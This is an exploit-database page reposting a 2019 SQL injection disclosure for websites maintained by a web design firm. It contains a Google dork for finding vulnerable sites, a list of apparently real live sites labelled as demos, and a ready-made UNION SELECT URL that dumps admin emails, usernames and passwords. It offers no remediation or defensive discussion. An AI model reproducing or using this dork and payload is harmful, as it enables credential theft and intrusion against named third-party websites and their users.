Advertisement






Maintained By Web Smile India - SQL Injection Vulnerability

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Web Smile India High Remote 2019-11-17
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110114

Below is a copy:

Maintained By Web Smile India - SQL Injection Vulnerability
---------------------------------------------------------
# Exploit Title: Maintained By Web Smile India - SQL Injection Vulnerability
# Date: 2019-11-14
# Exploit Author: FreeBuzz Team
# Vendor Homepage: http://www.websmileindia.com/
# Team Mail : [email protected]
# Tested on: Ubuntu
---------------------------------------------------------
Google Dork:
intext:"Maintained By Web Smile India " inurl:.php?id=

-

Demo:
https://www.foodpharma.in
https://www.novatek-electro.net
http://sumitsurgical.in/

Injection:
https://www.foodpharma.in/product.php?cid=-143+Union%20Select+1,2,3,Group_Concat(email,0x3a,username,0x3a,password),5,6,7,8,9,10+From+admin--+


----------------------------------------------------------
# Discovered by Unkn0wn[[email protected]]
# https://github.com/0x9a
# We Are : AloneGhost - VeNoM - Agent Haze - Old_One - Unkn0wn
 FreeBuzz Team @ 2012-2019 [FRB]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.